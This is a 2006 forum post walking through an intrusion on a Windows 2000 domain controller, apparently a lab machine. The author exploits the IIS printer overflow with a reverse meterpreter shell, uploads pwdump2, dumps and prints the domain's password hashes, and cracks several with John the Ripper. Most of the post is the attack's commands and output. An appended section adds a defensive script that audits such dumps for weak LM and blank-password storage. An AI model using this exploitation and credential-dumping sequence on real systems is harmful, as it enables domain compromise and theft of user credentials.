Title: Using MSF meterpreter to upload and use pwdump2 on a win2k DC
Post by: ChrisG on July 30, 2006, 10:06:36 PM

Here you go. I've been fooling around with the Metasploit meterpreter and used it to exploit a host, upload pwdump2, execute the program successfully to dump the SAM hashes for the domain, and then fire up john to crack the hashes. Enjoy...
SegFault:~/framework-2.5 chrisgates$ ./msfconsole

[msfconsole ASCII-art banner]

        + -- --=[ msfconsole v2.5 [114 exploits - 74 payloads]

msf > use iis50_printer_overflow
msf iis50_printer_overflow > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf iis50_printer_overflow(win32_reverse_meterpreter) > set RHOST 192.168.0.107
RHOST -> 192.168.0.107
msf iis50_printer_overflow(win32_reverse_meterpreter) > set LHOST 192.168.0.101
LHOST -> 192.168.0.101
msf iis50_printer_overflow(win32_reverse_meterpreter) > exploit

[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]

meterpreter> help

Core
Core feature set commands
------------    ----------------
read            Reads from a communication channel
write           Writes to a communication channel
close           Closes a communication channel
interact        Switch to interactive mode with a channel
help            Displays the list of all register commands
exit            Exits the client
initcrypt       Initializes the cryptographic subsystem

Extensions
Feature extension commands
------------    ----------------
loadlib         Loads a library on the remote endpoint
use             Uses a feature extension module

meterpreter> use
Usage: use -m module1,module2,module3 [ -p path ] [ -d ]

  -m <mod>    The names of one or more modules to load (e.g. 'net').
  -p <path>   The path to load the modules from locally.
  -d          Load the library from disk, do not upload it.

meterpreter> use -m Fs
loadlib: Loading library from 'ext680723.dll' on the remote machine.
meterpreter> loadlib: success.

meterpreter> help

Core
Core feature set commands
------------    ----------------
read            Reads from a communication channel
write           Writes to a communication channel
close           Closes a communication channel
interact        Switch to interactive mode with a channel
help            Displays the list of all register commands
exit            Exits the client
initcrypt       Initializes the cryptographic subsystem

Extensions
Feature extension commands
------------    ----------------
loadlib         Loads a library on the remote endpoint
use             Uses a feature extension module

File System
File system interaction and manipulation commands
------------    ----------------
cd              Change working directory.
getcwd          Get the current working directory.
ls              List the contents of a directory.
upload          Upload one or more files to a remote directory.
download        Download one or more files from a remote directory.

meterpreter> upload /Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE C:\
upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' to 'C:\\PWDUMP2.EXE'...
upload: 1 uploads started.
meterpreter> upload: Upload from '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' succeeded.

meterpreter> upload /Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL C:\
upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' to 'C:\\SAMDUMP.DLL'...
upload: 1 uploads started.
meterpreter> upload: Upload from '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' succeeded.

meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter> execute: success, process id is 2116.
execute: allocated channel 4 for new process.

meterpreter> interact 4
interact: Switching to interactive console on 4...
meterpreter> interact: Started interactive channel 4.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\>PWDUMP2
PWDUMP2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4d5c901afc6b10357012c647e1e3d7b:::
TsInternetUser:1000:747eb3a47d5c5997741c63e3b03d7af3:3600cc61d6a7732b46a82a8ba1ca98b2:::
NetShowServices:1001:00a1e1cd5cbee084f3e28a66a4b7c4b7:dc101f98eb6d8794771fcf7ce9906862:::
IUSR_LSO-HACKWINDOWS:1003:38925a13e93dfe7d3127babea64acab3:88c178bfaf976b026b3d36c01c11ca65:::
IWAM_LSO-HACKWINDOWS:1004:bed00505c344453b26d7329bcf953374:707983c77cff4606beb470e26122cf62:::
LSO:1111:743a025f7d3cfc4faad3b435b51404ee:bdf40214203c93099d9295c7d4595205:::
IME_USER:1112:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
IME_ADMIN:1113:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
testuser1:1115:0f20048efc645d0a179b4d5d6690bdf3:1120acb74670c7dd46f1d3f5038a5ce8:::
remote:1119:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
LSO-HACKWINDOWS$:1008:aad3b435b51404eeaad3b435b51404ee:872aa7a4b892bdb77dafec09c87fc7bb:::
TEST1$:1114:aad3b435b51404eeaad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

C:\>del PWDUMP2.EXE
del PWDUMP2.EXE
C:\PWDUMP2.EXE
Access is denied.

C:\>DEL SAMDUMP.DLL
DEL SAMDUMP.DLL

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A042-AC7F

 Directory of C:\

12/22/2005  02:11p      <DIR>          ASFRoot
12/24/2005  08:07a                 956 certreq.txt
12/22/2005  10:28p      <DIR>          Documents and Settings
12/22/2005  10:13p      <DIR>          Inetpub
01/02/2006  06:36a      <DIR>          Microsoft UAM Volume
01/02/2006  02:52a      <DIR>          Program Files
01/02/2006  12:45p              32,768 PWDUMP2.EXE
01/02/2006  07:11a      <DIR>          Share1
01/02/2006  07:11a      <DIR>          Share2
01/02/2006  05:09a      <DIR>          Share3
01/02/2006  02:50a      <DIR>          Snort
01/01/2006  05:30a      <DIR>          unzipped
01/01/2006  06:21a      <DIR>          WINNT
               2 File(s)         33,724 bytes
              11 Dir(s)   3,062,620,160 bytes free

C:\>exit
exit
interact: Ending interactive session.

meterpreter> getuid
meterpreter> Username: IUSR_LSO-HACKWINDOWS

meterpreter> exit
exit
The meterpreter is shutting down...

SegFault:~ chrisgates$ cp /Users/chrisgates/framework-2.5/evil/LSO-DC-hash.rtf /Users/chrisgates/john-1.6.39/run/
SegFault:~ chrisgates$ cd john-1.6.39/run/
SegFault:~/john-1.6.39/run chrisgates$ john -i LSO-DC-hash.rtf
Loaded 17 passwords with no different salts (NT LM DES [24/32 4K])
TESTUSE          (testuser1:1)
LSO              (LSO:1)
R1               (testuser1:2)
PASSWOR          (remote:1)
D                (remote:2)

***I cut john off early, it wasn't a cracking exercise***
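An added example, not part of the original post, written from the defender's side of a dump like the one above: it parses pwdump-format lines (user:rid:LMhash:NThash:::) and flags what makes them crackable in the first place, namely accounts with a blank password and accounts that still have an LM hash stored (an LM hash whose second half is aad3b435b51404ee means the password is 7 characters or fewer, which is why john recovered LSO from its first half alone). The sample lines in the block are constructed, not taken from the post.

```python
"""Audit a pwdump-format dump (user:rid:LMhash:NThash:::) for weak password
storage. Added example, not part of the original post; sample data is constructed."""
import re

# Well-known hashes of an empty password (LM and NT respectively).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# An LM hash is two independent 8-byte halves; this second half means the
# password had 7 characters or fewer, so one half is all a cracker must recover.
LM_EMPTY_HALF = "aad3b435b51404ee"

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):")


def parse_pwdump(text):
    """Yield (user, rid, lm, nt); echoed prompts and other non-dump lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            yield user, int(rid), lm.lower(), nt.lower()


def audit(text):
    """Return {user: [findings]} for every account with a weakness worth fixing."""
    findings = {}
    for user, rid, lm, nt in parse_pwdump(text):
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        elif lm != EMPTY_LM:
            issues.append("LM hash stored (crackable in 7-char halves)")
            if lm[16:] == LM_EMPTY_HALF:
                issues.append("password is 7 characters or fewer")
        if issues:
            findings[user] = issues
    return findings


# Constructed sample in pwdump2 format, including an echoed command line to skip.
SAMPLE = """\
C:\\>PWDUMP2
PWDUMP2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
shortpw:1120:0123456789abcdefaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
longpw:1121:1111222233334444aaaabbbbccccdddd:00001111222233334444555566667777:::
nolm:1122:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdefab:::
HOST$:1008:aad3b435b51404eeaad3b435b51404ee:12345678123456781234567812345678:::
"""
```

Accounts reported with an LM hash stored are the ones the "Network security: Do not store LAN Manager hash value on next password change" policy (NoLMHash) is meant to eliminate; the hash only disappears after the next password change.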